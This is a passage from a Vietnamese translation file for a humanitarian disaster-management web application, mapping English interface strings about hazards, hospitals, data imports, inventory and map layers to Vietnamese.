Pounds': 'Bảng Anh', 'Greater than 10 matches. Please refine search further': 'Tìm thấy nhiều hơn 10 kết quả. 
Hãy nhập lại từ khóa', 'Grid': 'Hiển thị dạng lưới', 'Group Description': 'Mô tả về nhóm', 'Group Details': 'Thông tin về nhóm', 'Group Head': 'Trưởng Nhóm', 'Group Members': 'Thành viên Nhóm', 'Group Memberships': 'Hội viên nhóm', 'Group Name': 'Tên nhóm', 'Group Type': 'Loại hình nhóm', 'Group added': 'Nhóm đã được thêm', 'Group deleted': 'Nhóm đã được xóa', 'Group description': 'Mô tả Nhóm', 'Group type': 'Loại nhóm', 'Group updated': 'Nhóm đã được cập nhật', 'Group': 'Nhóm', 'Grouped by': 'Nhóm theo', 'Groups': 'Nhóm', 'Guide': 'Hướng dẫn', 'HFA Priorities': 'Ưu tiên HFA', 'HFA1: Ensure that disaster risk reduction is a national and a local priority with a strong institutional basis for implementation.': 'HFA1: Đảm bảo rằng giảm thiểu rủi ro thảm họa là ưu tiên quốc gia và địa phương với một nền tảng tổ chức mạnh mẽ để thực hiện hoạt động', 'HFA2: Identify, assess and monitor disaster risks and enhance early warning.': 'HFA2: Xác định, đánh giá và giám sát rủi ro thảm họa và tăng cường cảnh báo sớm.', 'HFA3: Use knowledge, innovation and education to build a culture of safety and resilience at all levels.': 'HFA3: Sử dụng kiến thức, sáng kiến và tập huấn để xây dựng cộng đồng an toàn ở mọi cấp.', 'HFA4: Reduce the underlying risk factors.': 'HFA4: Giảm các yếu tố rủi ro gốc rễ', 'HFA5: Strengthen disaster preparedness for effective response at all levels.': 'HFA5: Tăng cường phòng ngừa thảm họa để đảm bảo ứng phó hiệu quả ở mọi cấp.', 'HIGH RESILIENCE': 'MỨC ĐỘ AN TOÀN CAO', 'HIGH': 'CAO', 'Hail': 'Mưa đá', 'Hair Color': 'Màu tóc', 'Hair Length': 'Độ dài tóc', 'Hair Style': 'Kiểu tóc', 'Has the %(GRN)s (%(GRN_name)s) form been completed?': 'Mẫu %(GRN)s (%(GRN_name)s) đã được hoàn thành chưa?', 'Has the Certificate for receipt of the shipment been given to the sender?': 'Chứng nhận đã nhận lô hàng đã được đưa cho người gửi chưa?', 'Hazard Details': 'Thông tin vê hiểm họa', 'Hazard Points': 'Điểm hiểm họa', 'Hazard added': 'Hiểm họa đã được thêm', 'Hazard deleted': 'Hiểm họa đã được xóa', 'Hazard updated': 'Hiểm họa đã được cập nhật', 'Hazard': 'Hiểm họa', 'Hazardous Material': 'Vật liệu nguy hiểm', 'Hazardous Road Conditions': 'Điều kiện đường xá nguy hiểm', 'Hazards': 'Hiểm họa', 'Header Background': 'Nền vùng trên', 'Health & Health Facilities': 'CSSK & Cơ sở CSSK', 'Health Insurance': 'Bảo hiểm y tế', 'Health center': 'Trung tâm y tế', #'Health': 'Sức khỏe', 'Health': 'CSSK', 'Heat Wave': 'Đợt nắng nóng kéo dài', 'Heat and Humidity': 'Nóng và ẩm', 'Height (cm)': 'Chiều cao (cm)', 'Height (m)': 'Chiều cao (m)', 'Height': 'Chiều cao', 'Help': 'Trợ giúp', 'Helps to monitor status of hospitals': 'Hỗ trợ giám sát trạng thái các bệnh viện', 'Helps to report and search for Missing Persons': 'Hỗ trợ báo cáo và tìm kiếm những người mất tích', 'Hide Chart': 'Ẩn biểu đồ', 'Hide Pivot Table': 'Ẩn Pivot Table', 'Hide Table': 'Ẩn bảng', 'Hide': 'Ẩn', 'Hierarchy Level 1 Name (e.g. State or Province)': 'Hệ thống tên cấp 1 (ví dụ Bang hay Tỉnh)', 'Hierarchy Level 2 Name (e.g. District or County)': 'Hệ thống tên cấp 2 (ví dụ Huyện hay thị xã)', 'Hierarchy Level 3 Name (e.g. City / Town / Village)': 'Hệ thống tên cấp 3 (ví dụ Thành phố/thị trấn/xã)', 'Hierarchy Level 4 Name (e.g. 
Neighbourhood)': 'Hệ thống tên cấp 4 (ví dụ xóm làng)', 'Hierarchy Level 5 Name': 'Hệ thống tên cấp 5', 'Hierarchy': 'Thứ tự', 'High School': 'Phổ thông', 'High Water': 'Nước Cao', 'High': 'Cao', 'Hindu': 'Người theo đạo Hindu', 'History': 'Lịch sử', 'Hit the back button on your browser to try again.': 'Bấm nút quay lại trên trình duyệt để thử lại', 'Home Address': 'Địa chỉ nhà riêng', 'Home Country': 'Bản quốc', 'Home Crime': 'Tội ác tại nhà', 'Home phone': 'Điện thoại nhà riêng', 'Home Town': 'Nguyên quán', 'Home': 'Trang chủ', 'Hospital Details': 'Chi tiết thông tin bệnh viện', 'Hospital Status Report': 'Báo cáo tình trạng bệnh viện', 'Hospital information added': 'Đã thêm thông tin Bệnh viện', 'Hospital information deleted': 'Đã xóa thông tin bệnh viện', 'Hospital information updated': 'Đã cập nhật thông tin bệnh viện', 'Hospital status assessment.': 'Đánh giá trạng thái bệnh viện', 'Hospital': 'Bệnh viện', 'Hospitals': 'Bệnh viện', 'Host National Society': 'Hội QG chủ nhà', 'Host': 'Chủ nhà', 'Hot Spot': 'Điểm Nóng', 'Hour': 'Thời gian', 'Hourly': 'Theo giờ', 'Hours Details': 'Thông tin về thời gian hoạt động', 'Hours Model': 'Chuyên trách/ kiêm nhiệm', 'Hours added': 'Thời gian hoạt động đã được thêm', 'Hours by Program Report': 'Thời gian hoạt động theo chương trình', 'Hours by Role Report': 'Thời gian hoạt động theo vai trò', 'Hours deleted': 'Thời gian hoạt động đã được xóa', 'Hours updated': 'Thời gian hoạt động đã được cập nhật', 'Hours': 'Thời gian hoạt động', 'Households below %(br)s poverty line': 'Hộ gia đình dưới %(br)s mức nghèo', 'Households below poverty line': 'Hộ gia đình dưới mức nghèo', 'Households': 'Hộ gia đình', 'Housing Repair & Retrofitting': 'Sửa chữa và cải tạo nhà', 'How data shall be transferred': 'Dữ liệu sẽ được chuyển giao như thế nào', 'How local records shall be updated': 'Hồ sơ địa phương sẽ được cập nhật thế nào', 'How many Boys (0-17 yrs) are Injured due to the crisis': 'Đối tượng nam trong độ tuổi 0-17 bị thương trong thiên tai', 'How many Boys (0-17 yrs) are Missing due to the crisis': 'Có bao nhiêu bé trai (0 đến 17 tuổi) bị mất tích do thiên tai', 'How many Girls (0-17 yrs) are Injured due to the crisis': 'Đối tượng nữ từ 0-17 tuổi bị thương trong thiên tai', 'How many Men (18 yrs+) are Dead due to the crisis': 'Bao nhiêu nam giới (trên 18 tuổi) chết trong thảm họa', 'How many Men (18 yrs+) are Missing due to the crisis': 'Đối tượng nam 18 tuổi trở lên mất tích trong thiên tai', 'How many Women (18 yrs+) are Dead due to the crisis': 'Đối tượng nữ từ 18 tuổi trở lên thiệt mạng trong thiên tai', 'How many Women (18 yrs+) are Injured due to the crisis': 'Số nạn nhân là nữ trên 18 tuổi chịu ảnh hưởng của cuộc khủng hoảng', 'How much detail is seen. A high Zoom level means lot of detail, but not a wide area. A low Zoom level means seeing a wide area, but not a high level of detail.': 'Mức độ chi tiết có thể xem. Mức phóng to cao có thể xem được nhiều chi tiết, nhưng không xem được diện tích rộng. Mức Phóng thấp có thể xem được diện tích rộng, nhưng không xem được nhiều chi tiết.', 'How often you want to be notified. If there are no changes, no notification will be sent.': 'Mức độ thường xuyên bạn muốn nhận thông báo. 
Nếu không có thay đổi, bạn sẽ không nhận được thông báo.', 'How you want to be notified.': 'Bạn muốn được thông báo như thế nào.', 'Human Resource Assignment updated': 'Phân bổ nguồn nhân lực đã được cập nhật', 'Human Resource Assignments': 'Phân bổ nguồn nhân lực', 'Human Resource Details': 'Thông tin về nguồn nhân lực', 'Human Resource assigned': 'Nguồn nhân lực được phân bổ', 'Human Resource Development': 'Phát triển nguồn nhân lực', 'Human Resource unassigned': 'Nguồn nhân lực chưa được phân bổ', 'Human Resource': 'Nguồn Nhân lực', 'Human Resources': 'Nguồn Nhân lực', 'Hurricane Force Wind': 'Gió mạnh cấp bão lốc', 'Hurricane': 'Bão lốc', 'Hygiene Promotion': 'Tăng cường vệ sinh', 'Hygiene kits, source': 'Dụng cụ vệ sinh, nguồn', 'I accept. Create my account.': 'Tôi đồng ý. Tạo tài khoản của tôi', 'ICONS': 'BIỂU TƯỢNG', 'ID Card Number': 'Số Chứng minh thư nhân dân', 'ID Tag Number': 'Số nhận dạng thẻ', 'ID type': 'Loại giấy tờ nhận dạng', 'ID': 'Thông tin nhận dạng', 'IEC Materials': 'Tài liệu tuyên truyền', 'INDICATOR RATINGS': 'XẾP LOẠI CHỈ SỐ', 'INDICATORS': 'CHỈ SỐ', 'Ice Pressure': 'Sức ép băng tuyết', 'Iceberg': 'Tảng băng', 'Identification label of the Storage bin.': 'Nhãn xác định Bin lưu trữ', 'Identifier Name for your Twilio Account.': 'Xác định tên trong tài khoản Twilio của bạn', 'Identifier which the repository identifies itself with when sending synchronization requests.': 'Xác định danh mục lưu trữ nào cần được yêu cầu đồng bộ hóa', 'Identities': 'Các Chứng minh', 'Identity Details': 'Chi tiết Chứng minh', 'Identity added': 'Thêm Chứng minh', 'Identity deleted': 'Xóa Chứng minh', 'Identity updated': 'Cập nhật Chứng minh', 'Identity': 'Chứng minh ND', 'If a ticket was issued then please provide the Ticket ID.': 'Nếu vé đã được cấp, vui lòng cung cấp mã vé', 'If a user verifies that they own an Email Address with this domain, the Approver field is used to determine whether & by whom further approval is required.': 'Nếu người dùng xác nhận rằng họ sở hữu địa chỉ email với miền này, ô Người phê duyệt sẽ được sử dụng để xác định xem liệu có cần thiết phải có phê duyệt và phê duyệt của ai.', 'If checked, the notification will contain all modified records. If not checked, a notification will be send for each modified record.': 'Nếu chọn, thông báo sẽ bao gồm toàn bộ hồ sơ được chỉnh sửa. 
Nếu không chọn, thông báo sẽ được gửi mỗi khi có hồ sơ được chỉnh sửa', 'If it is a URL leading to HTML, then this will downloaded.': 'Nếu đó là đường dẫn URL dẫn đến trang HTML, thì sẽ được tải xuống', 'If neither are defined, then the Default Marker is used.': 'Nếu cả hai đều không được xác định, thì đánh dấu mặc định sẽ được sử dụng.', 'If none are selected, then all are searched.': 'Nếu không chọn gì, thì sẽ tìm kiếm tất cả.', 'If not found, you can have a new location created.': 'Nếu không tìm thấy, bạn có thể tạo địa điểm mới.', 'If the location is a geographic area, then state at what level here.': 'Nếu địa điểm là một vùng địa lý thì cần nêu rõ là cấp độ nào ở đây.', 'If the person counts as essential staff when evacuating all non-essential staff.': 'Nếu người đó là cán bộ chủ chốt khi đó sẽ sơ tán mọi cán bộ không quan trọng.', 'If the request is for %s, please enter the details on the next screen.': 'Nếu yêu cầu là %s thì xin mời nhập các chi tiết vào trang tiếp theo.', 'If the request type is "Other", please enter request details here.': "Nếu loại yêu cầu là 'Khác', xin nhập chi tiết của yêu cầu ở đây.", 'If this field is populated then a user with the Domain specified will automatically be assigned as a Staff of this Organization': 'Nếu trường này được điền, người dùng có Miền được chỉ định sẽ tự động được phân công làm Cán bộ của Tổ chức này', 'If this is set to True then mails will be deleted from the server after downloading.': 'Nếu đã được xác định là Đúng, thư sau đó sẽ bị xóa khỏi máy chủ sau khi tải về', 'If this record should be restricted then select which role is required to access the record here.': 'Nếu hồ sơ này cần bị hạn chế truy cập, lựa chọn ở đây chức năng nào có thể truy cập vào hồ sơ này ', 'If this record should be restricted then select which role(s) are permitted to access the record here.': 'Nếu hồ sơ này cần bị hạn chế truy cập, lựa chọn ở đây những chức năng nào được quyền truy cập vào hồ sơ này ', 'If yes, specify what and by whom': 'Nếu có, hãy ghi rõ những gì và do ai', 'If yes, which and how': 'Nếu có thì cái nào và như thế nào', 'If you need to add a new document then you can click here to attach one.': 'Nếu cần thêm một tài liệu mới, nhấn vào đây để đính kèm', 'If you want several values, then separate with': 'Nếu bạn muốn nhiều giá trị, thì tách rời với', 'If you would like to help, then please %(sign_up_now)s': 'Nếu bạn muốn giúp đỡ, thì xin mời %(sign_up_now)s', 'If you would like to help, then please': 'Vui lòng giúp đỡ nếu bạn muốn', 'Ignore Errors?': 'Bỏ qua lỗi?', 'Illegal Immigrant': 'Người nhập cư bất hợp pháp', 'Image Details': 'Chi tiết hình ảnh', 'Image File(s), one image per page': 'Tệp hình ảnh, một hình ảnh trên một trang', 'Image Type': 'Loại hình ảnh', 'Image added': 'Thêm hình ảnh', 'Image deleted': 'Xóa hình ảnh', 'Image updated': 'Cập nhật hình ảnh', 'Image': 'Hình ảnh', 'Image/Attachment': 'Ảnh/ tệp đính kèm', 'Images': 'Các hình ảnh', 'Impact Assessments': 'Đánh giá tác động', 'Import Activity Data': 'Nhập khẩu dữ liệu hoạt động', 'Import Annual Budget data': 'Nhập khẩu dữ liệu ngân sách hàng năm', 'Import Assets': 'Nhập khẩu dữ liệu tài sản', 'Import Branch Organizations': 'Nhập khẩu dữ liệu về Tỉnh/thành Hội', 'Import Certificates': 'Nhập khẩu dữ liệu về chứng chỉ tập huấn', 'Import Community Data': 'Nhập khẩu dữ liệu cộng đồng', 'Import Completed Assessment Forms': 'Nhập khẩu biểu mẫu đánh giá đã hoàn chỉnh', 'Import Courses': 'Nhập khẩu dữ liệu về khóa tập huấn', 'Import Data for Theme Layer': 
'Nhập khẩu dữ liệu cho lớp chủ đề', 'Import Demographic Data': 'Nhập khẩu số liệu dân số', 'Import Demographic Sources': 'Nhập khẩu nguồn số liệu dân số', 'Import Demographic': 'Nhập khẩu dữ liệu nhân khẩu', 'Import Demographics': 'Tải dữ liệu dân số', 'Import Departments': 'Nhập khẩu dữ liệu phòng/ban', 'Import Facilities': 'Nhập khẩu bộ phận', 'Import Facility Types': 'Nhập khẩu loại hình bộ phận', 'Import File': 'Nhập khẩu File', 'Import Framework data': 'Nhập khẩu dữ liệu về khung chương trình', 'Import Hazards': 'Nhập khẩu hiểm họa', 'Import Hours': 'Nhập khẩu thời gian hoạt động', 'Import Incident Reports from Ushahidi': 'Nhập khẩu báo cáo sự cố từ Ushahidi', 'Import Incident Reports': 'Nhập khẩu báo cáo sự cố', 'Import Job Roles': 'Nhập khẩu vai trò công việc', 'Import Jobs': 'Nhập khẩu công việc', 'Import Location Data': 'Nhập khẩu dữ liệu địa điểm', 'Import Locations': 'Nhập khẩu địa điểm', 'Import Logged Time data': 'Nhập khẩu dữ liệu thời gian truy cập', 'Import Members': 'Nhập khẩu thành viên', 'Import Membership Types': 'Nhập khẩu loại hình thành viên', 'Import Milestone Data': 'Nhập khẩu dữ liệu các thời điểm quan trọng', 'Import Milestones': 'Tải dữ liệu các thời điểm quan trọng', 'Import Offices': 'Nhập khẩu văn phòng', 'Import Organizations': 'Nhập khẩu tổ chức', 'Import Participant List': 'Nhập khẩu danh sách học viên', 'Import Participants': 'Tải người tham dự', 'Import Partner Organizations': 'Nhập khẩu dữ liệu về tổ chức đối tác', 'Import Project Communities': 'Nhập khẩu cộng đồng dự án', 'Import Project Organizations': 'Nhập khẩu tổ chức dự án', 'Import Projects': 'Nhập khẩu dự án', 'Import Red Cross & Red Crescent National Societies': 'Nhập khẩu dữ liệu về Hội CTĐ & TLLĐ Quốc gia', 'Import Staff': 'Nhập khẩu cán bộ', 'Import Stations': 'Nhập khẩu các trạm', 'Import Statuses': 'Nhập khẩu tình trạng', 'Import Suppliers': 'Nhập khẩu các nhà cung cấp', 'Import Tasks': 'Nhập khẩu Nhiệm vụ', 'Import Template Layout': 'Nhập khẩu sơ đồ mẫu', 'Import Templates': 'Nhập khẩu biểu mẫu', 'Import Theme data': 'Nhập khẩu dữ liệu chủ đề', 'Import Themes': 'Nhập khẩu Chủ đề', 'Import Training Events': 'Nhập khẩu sự kiện tập huấn', 'Import Training Participants': 'Nhập khẩu dữ liệu học viên được tập huấn', 'Import Vehicles': 'Nhập khẩu các phương tiện đi lại', 'Import Volunteer Cluster Positions': 'Nhập khẩu vị trí nhóm tình nguyện viên', 'Import Volunteer Cluster Types': 'Nhập khẩu loại hình nhóm tình nguyện viên', 'Import Volunteer Clusters': 'Nhập khẩu nhóm tình nguyện viên', 'Import Volunteers': 'Nhập khẩu tình nguyện viên', 'Import Vulnerability Aggregated Indicator': 'Nhập khẩu chỉ số phân tách tình trạng dễ bị tổn thương', 'Import Vulnerability Data': 'Nhập khẩu dữ liệu tình trạng dễ bị tổn thương', 'Import Vulnerability Indicator Sources': 'Nhập khẩu Nguồn chỉ số tình trạng dễ bị tổn thương', 'Import Vulnerability Indicator': 'Nhập khẩu chỉ số tình trạng dễ bị tổn thương', 'Import Warehouse Stock': 'Nhập khẩu hàng lưu kho', 'Import Warehouses': 'Nhập khẩu kho', 'Import from CSV': 'Nhập khẩu từ CSV', 'Import from OpenStreetMap': 'Nhập khẩu từ bản đồ OpenstreetMap', 'Import multiple tables as CSV': 'Nhập khẩu nhiều bảng dưới dạng CSV', 'Import': 'Nhập khẩu dữ liệu', 'Import/Export': 'Nhập/ Xuất dữ liệu', 'Important': 'Quan trọng', 'Imported data': 'Dữ liệu đã nhập', 'In Catalogs': 'Trong danh mục', 'In GeoServer, this is the Layer Name. Within the WFS getCapabilities, this is the FeatureType Name part after the colon(:).': 'Trong GeoServer, đây là tên lớp. 
Trong WFS getCapabilities, đây là tên FeatureType, phần sau dấu hai chấm (:).', 'In Inventories': 'Trong nhóm hàng', 'In Process': 'Đang tiến hành', 'In Stock': 'Đang lưu kho', 'In error': 'mắc lỗi', 'In order to be able to edit OpenStreetMap data from within %(name_short)s, you need to register for an account on the OpenStreetMap server.': 'Để có thể chỉnh sửa dữ liệu trên OpenstreetMap từ trong %(name_short)s, bạn cần đăng ký tài khoản trên máy chủ OpenStreetMap.', 'In transit': 'Đang trên đường', 'Inbound Mail Settings': 'Cài đặt thư đến', 'Inbound Message Source': 'Nguồn thư đến', 'Incident Categories': 'Danh mục sự cố', 'Incident Commander': 'Chỉ huy tình huống tai nạn', 'Incident Report Details': 'Chi tiết Báo cáo tai nạn', 'Incident Report added': 'Thêm Báo cáo tai nạn', 'Incident Report deleted': 'Xóa Báo cáo tai nạn', 'Incident Report updated': 'Cập nhật Báo cáo tai nạn', 'Incident Report': 'Báo cáo tai nạn', 'Incident Reports': 'Báo cáo sự cố', 'Incident Timeline': 'Dòng thời gian tai nạn', 'Incident Types': 'Loại sự cố', 'Incident': 'Sự cố', 'Incidents': 'Tai nạn', 'Include any special requirements such as equipment which they need to bring.': 'Bao gồm các yêu cầu đặc biệt như thiết bị cần mang theo', 'Include core files': 'Bao gồm các tệp chủ chốt', 'Including emerging and re-emerging diseases, vaccine preventable diseases, HIV, TB': 'Gồm các bệnh mới bùng phát và tái bùng phát, các bệnh có thể ngừa bằng vaccine, HIV, lao phổi', 'Incoming Shipments': 'Lô hàng đang đến', 'Incorrect parameters': 'Tham số không đúng', 'Indicator Comparison': 'So sánh chỉ số', 'Indicator': 'Chỉ số', 'Indicators': 'Chỉ số', 'Individuals': 'Cá nhân', 'Industrial Crime': 'Tội ác công nghiệp', 'Industry Fire': 'Cháy nổ công nghiệp', 'Infant (0-1)': 'Trẻ sơ sinh (0-1)', 'Infectious Disease (Hazardous Material)': 'Dịch bệnh lây nhiễm (vật liệu nguy hiểm)', 'Infectious Disease': 'Dịch bệnh lây nhiễm', 'Infestation': 'Sự phá hoại', 'Informal camp': 'Trại không chính thức', 'Information Management': 'Quản lý thông tin', #'Information Technology': 'Công nghệ thông tin', 'Information Technology': 'CNTT', 'Infrastructure Development': 'Phát triển cơ sở hạ tầng', 'Inherited?': 'Được thừa kế?', 'Initials': 'Tên viết tắt', 'Insect Infestation': 'Dịch sâu bọ', 'Instance Type': 'Loại thực thể', 'Instant Porridge': 'Cháo ăn liền', 'Insurance Number': 'Số sổ/thẻ bảo hiểm', 'Insurer': 'Nơi đăng ký BHXH', 'Instructor': 'Giảng viên', 'Insufficient Privileges': 'Không đủ đặc quyền', 'Insufficient vars: Need module, resource, jresource, instance': 'Không đủ biến: cần module, resource, jresource, instance', 'Integrity error: record can not be deleted while it is referenced by other records': 'Lỗi liên kết: hồ sơ không thể bị xóa khi đang được liên kết với hồ sơ khác', 'Intermediate': 'Trung cấp', 'Internal Shipment': 'Vận chuyển nội bộ', 'Internal State': 'Tình trạng bên trong', 'International NGO': 'Tổ chức phi chính phủ quốc tế', 'International Organization': 'Tổ chức quốc tế', 'Interview taking place at': 'Phỏng vấn diễn ra tại', 'Invalid Location!': 'Vị trí không hợp lệ!', 'Invalid Query': 'Truy vấn không hợp lệ', 'Invalid Site!': 'Trang không hợp lệ!', 'Invalid form (re-opened in another window?)': 'Mẫu không hợp lệ (mở lại trong cửa sổ khác?)', 'Invalid phone number!': 'Số điện thoại không hợp lệ!', 'Invalid phone number': 'Số điện thoại không đúng', 'Invalid request!': 'Yêu cầu không hợp lệ!', 'Invalid request': 'Yêu cầu không hợp lệ', 'Invalid source': 'Nguồn không hợp lệ', 'Invalid ticket': 'Vé không đúng', 
'Invalid': 'Không đúng', 'Inventory Adjustment Item': 'Mặt hàng điều chỉnh sau kiểm kê', 'Inventory Adjustment': 'Điều chỉnh sau kiểm kê', 'Inventory Item Details': 'Chi tiết hàng hóa trong kho', 'Inventory Item added': 'Bổ sung hàng hóa vào kho lưu trữ.', 'Inventory Items include both consumable supplies & those which will get turned into Assets at their destination.': 'Hàng hóa kiểm kê bao gồm cả hàng tiêu hao & hàng hóa sẽ được trả lại như tài sản tại đích đến', 'Inventory Items': 'Mặt hàng kiểm kê', 'Inventory Store Details': 'Chi tiết kho lưu trữ', 'Inventory of Effects': 'Kho dự phòng', 'Inventory': 'Kiểm kê', 'Is editing level L%d locations allowed?': 'Có được phép chỉnh sửa vị trí cấp độ L%d?', 'Is this a strict hierarchy?': 'Có phải là thứ tự đúng?', 'Issuing Authority': 'Cơ quan cấp', 'It captures not only the places where they are active, but also captures information on the range of projects they are providing in each area.': 'Nó không chỉ nhận các vị trí đang kích hoạt mà cũng nhận các thông tin về các dự án đang có ở từng vùng', 'Item Added to Shipment': 'Mặt hàng được thêm vào lô hàng vận chuyển', 'Item Catalog Details': 'Thông tin danh mục hàng hóa', 'Item Catalog added': 'Đã thêm danh mục hàng hóa', 'Item Catalog deleted': 'Đã xóa danh mục hàng hóa', 'Item Catalog updated': 'Đã cập nhật danh mục hàng hóa', 'Item Catalogs': 'Danh mục hàng hóa', 'Item Categories': 'Loại hàng hóa', 'Item Category Details': 'Thông tin danh mục hàng hóa', 'Item Category added': 'Danh mục hàng hóa đã được thêm', 'Item Category deleted': 'Danh mục hàng hóa đã được xóa', 'Item Category updated': 'Danh mục hàng hóa đã được cập nhật', 'Item Category': 'Danh mục hàng hóa', 'Item Code': 'Mã hàng', 'Item Details': 'Thông tin hàng hóa', 'Item Name': 'Tên hàng', 'Item Pack Details': 'Thông tin về gói hàng', 'Item Pack added': 'Gói hàng đã được thêm', 'Item Pack deleted': 'Gói hàng đã được xóa', 'Item Pack updated': 'Gói hàng đã được cập nhật', 'Item Packs': 'Gói hàng', 'Item Status': 'Tình trạng hàng hóa', 'Item Sub-Category updated': 'Đã cập nhật tiêu chí phụ của hàng hóa', 'Item Tracking Status': 'Theo dõi tình trạng hàng hóa', 'Item added to stock': 'Mặt hàng được thêm vào kho', 'Item added': 'Mặt hàng đã được thêm', 'Item already in Bundle!': 'Hàng đã có trong Bundle!', 'Item deleted': 'Mặt hàng đã được xóa', 'Item quantity adjusted': 'Số lượng hàng đã được điều chỉnh', 'Item updated': 'Mặt hàng đã được cập nhật', 'Item': 'Mặt hàng', 'Item(s) added to Request': 'Hàng hóa đã được thêm vào yêu cầu', 'Item(s) deleted from Request': 'Hàng hóa đã được xóa khỏi yêu cầu', 'Item(s) updated on Request': 'Hàng hóa đã được cập nhật vào yêu cầu', 'Item/Description': 'Mặt hàng/ Miêu tả', 'Items in Category are Vehicles': 'Mặt hàng trong danh mục là phương tiện vận chuyển', 'Items in Category can be Assets': 'Mặt hàng trong danh mục có thể là tài sản', 'Items in Request': 'Hàng hóa trong thư yêu cầu', 'Items in Stock': 'Hàng hóa lưu kho', 'Items': 'Hàng hóa', 'Items/Description': 'Mô tả/Hàng hóa', 'JS Layer': 'Lớp JS', 'Jewish': 'Người Do Thái', 'Job Role Catalog': 'Danh mục vai trò công việc', 'Job Role Details': 'Chi tiết vai trò công việc', 'Job Role added': 'Vai trò công việc đã được thêm', 'Job Role deleted': 'Vai trò công việc đã được xóa', 'Job Role updated': 'Vai trò công việc đã được cập nhật', 'Job Role': 'Vai trò công việc', 'Job Schedule': 'Kế hoạch công việc', 'Job Title Catalog': 'Vị trí chức vụ', 'Job Title Details': 'Chi tiết chức danh công việc', 'Job Title added': 'Chức danh công việc đã được 
thêm', 'Job Title deleted': 'Chức danh công việc đã được xóa', 'Job Title updated': 'Chức danh công việc đã được cập nhật', 'Job Title': 'Chức danh công việc', 'Job Titles': 'Chức vụ', 'Job added': 'Công việc đã được thêm', 'Job deleted': 'Công việc đã được xóa', 'Job reactivated': 'Công việc đã được kích hoạt lại', 'Job updated': 'Công việc đã được cập nhật', 'Journal Entry Details': 'Chi tiết ghi chép nhật ký', 'Journal entry added': 'Ghi chép nhật ký đã được thêm', 'Journal entry deleted': 'Ghi chép nhật ký đã được xóa', 'Journal entry updated': 'Ghi chép nhật ký đã được cập nhật', 'Journal': 'Nhật ký', 'KML Layer': 'Lớp KML', 'Key Value pairs': 'Đôi giá trị Khóa', 'Key deleted': 'Đã xóa từ khóa', 'Key': 'Khóa', 'Keyword': 'Từ khóa', 'Keywords': 'Từ khóa', 'Kit Created': 'Thùng hàng đã được tạo', 'Kit Details': 'Chi tiết thùng hàng', 'Kit Item': 'Mặt hàng trong thùng', 'Kit Items': 'Mặt hàng trong thùng', 'Kit canceled': 'Thùng hàng đã được hủy', 'Kit deleted': 'Đã xóa Kit', 'Kit updated': 'Thùng hàng đã được cập nhật', 'Kit': 'Thùng hàng', 'Kit?': 'Thùng hàng?', 'Kits': 'Thùng hàng', 'Kitting': 'Trang bị dụng cụ', 'Knowledge Management': 'Quản lý tri thức', 'Known Locations': 'Vị trí được xác định', 'LEGEND': 'CHÚ GIẢI', 'LICENSE': 'Bản quyền', 'LOW RESILIENCE': 'MỨC ĐỘ AN TOÀN THẤP', 'LOW': 'THẤP', 'Label': 'Nhãn', 'Lack of transport to school': 'Thiếu phương tiện di chuyển cho trẻ em đến trường', 'Lahar': 'Dòng bùn núi lửa', 'Land Slide': 'Sạt lở đất', 'Landslide': 'Sạt lở đất', 'Language Code': 'Mã Ngôn ngữ', 'Language code': 'Mã ngôn ngữ', 'Language': 'Ngôn ngữ', 'Last Checked': 'Lần cuối cùng được kiểm tra', 'Last Data Collected on': 'Dữ liệu mới nhất được thu thập trên', 'Last Name': 'Tên họ', 'Last Pull': 'Kéo gần nhất', 'Last Push': 'Đẩy gần nhất', 'Last known location': 'Địa điểm vừa biết đến', 'Last pull on': 'Kéo về gần đây', 'Last push on': 'Đẩy vào gần đây', 'Last run': 'Lần chạy gần nhất', 'Last status': 'Trạng thái gần đây', 'Last updated': 'Cập nhật mới nhất', 'Last': 'Trang cuối', 'Latitude & Longitude': 'Vĩ độ & Kinh độ', 'Latitude is Invalid!': 'Vĩ độ không hợp lệ', 'Latitude is North-South (Up-Down). Latitude is zero on the equator and positive in the northern hemisphere and negative in the southern hemisphere.': 'Vĩ độ là Bắc-Nam (trên xuống). 
Vĩ độ bằng không trên đường xích đạo, dương phía bán cầu Bắc và âm phía bán cầu Nam', 'Latitude is North-South (Up-Down).': 'Vĩ độ Bắc-Nam (trên-xuống)', 'Latitude is zero on the equator and positive in the northern hemisphere and negative in the southern hemisphere.': 'Vĩ độ bằng 0 là ở xích đạo và có giá trị dương ở bắc bán cầu và giá trị âm ở nam bán cầu', 'Latitude must be between -90 and 90.': 'Vĩ độ phải nằm giữa -90 và 90', 'Latitude of Map Center': 'Vĩ độ trung tâm bản đồ vùng', 'Latitude of far northern end of the region of interest.': 'Vĩ độ bắc điểm cuối của vùng quan tâm', 'Latitude of far southern end of the region of interest.': 'Vĩ độ nam điểm cuối của vùng quan tâm', 'Latitude should be between': 'Vĩ độ phải từ ', 'Latitude': 'Vĩ độ', 'Latrines': 'Nhà vệ sinh', 'Layer Details': 'Thông tin về Lớp', 'Layer Name': 'Tên lớp', 'Layer Properties': 'Đặc tính của lớp bản đồ', 'Layer added': 'Lớp đã được thêm', 'Layer deleted': 'Lớp đã được xóa', 'Layer has been Disabled': 'Lớp đã bị khóa', 'Layer has been Enabled': 'Lớp đã được bật', 'Layer removed from Symbology': 'Lớp đã được gỡ khỏi danh mục biểu tượng', 'Layer updated': 'Lớp đã được cập nhật', 'Layer': 'Lớp', 'Layers updated': 'Đã cập nhật Layer', 'Layers': 'Lớp', 'Layout': 'Định dạng', 'Lead Implementer for this project is already set, please choose another role.': 'Người thực hiện chính của Dự án này đã được chỉ định, đề nghị chọn một vai trò khác', 'Lead Implementer': 'Trưởng nhóm thực hiện', 'Lead Organization': 'Tổ chức chỉ đạo', 'Leader': 'Người lãnh đạo', 'Leave blank to request an unskilled person': 'Bỏ trắng nếu yêu cầu người không cần kỹ năng', 'Left-side is fully transparent (0), right-side is opaque (1.0).': 'Bên trái là hoàn toàn trong suốt (0), bên phải là không trong suốt (1.0)', 'Legend URL': 'Chú giải URL', 'Legend': 'Chú giải', 'Length (m)': 'Chiều dài (m)', 'Length': 'Độ dài', 'Less Options': 'Thu hẹp chức năng', 'Level of Award (Count)': 'Trình độ học vấn (Số lượng)', 'Level of Award': 'Trình độ học vấn', 'Level of competency this person has with this skill.': 'Cấp độ năng lực của người này với kỹ năng đó', 'Level': 'Cấp độ', 'Library support not available for OpenID': 'Thư viện hỗ trợ không có sẵn cho OpenID', 'License Number': 'Số giấy phép', 'Link (or refresh link) between User, Person & HR Record': 'Đường dẫn (hay đường dẫn mới) giữa người dùng, người và hồ sơ cán bộ', 'Link to this result': 'Đường dẫn tới kết quả này', 'Link': 'Liên kết', 'List / Add Baseline 